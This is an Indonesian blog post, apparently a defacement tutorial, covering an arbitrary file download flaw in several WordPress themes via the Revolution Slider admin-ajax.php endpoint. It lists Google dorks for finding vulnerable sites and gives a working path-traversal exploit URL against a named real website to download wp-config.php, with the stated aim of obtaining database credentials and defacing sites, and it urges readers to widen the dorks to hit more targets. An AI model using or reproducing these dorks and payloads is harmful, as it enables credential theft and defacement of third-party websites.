kali ini saya mau share tutorial deface Arbitrary File Download ,
sebenernya gimana kita mainin dork trus kita dapet wp-config.php suatu website
dan Host Databasenya itu bukan localhost :D
(kok andela lagi rul? ya biarin lah cewek2 gw ini :v sadis)
lanjut2
Google Dork:
"Index of" +/wp-content/themes/cuckootap/
"Index of" +/wp-content/themes/IncredibleWP/
"Index of" +/wp-content/themes/ultimatum/
"Index of" +/wp-content/themes/medicate/
"Index of" +/wp-content/themes/Centum/
"Index of" +/wp-content/themes/Avada/
"Index of" +/wp-content/themes/striking_r/
"Index of" +/wp-content/themes/beach_apollo/
(kalau mau dapet banyak website , kembangkan lagi dork nya :D)
Exploit/Poc :
http://jkt48.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
hingga dapet yg seperti ini :
Tag :
Deface Mulitple WordPress Themes
Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download
Deface Arbitrary File Download
Deface Mass Arbitrary
Content Creator : Syahrul Ramadhan
0 comments:
Post a Comment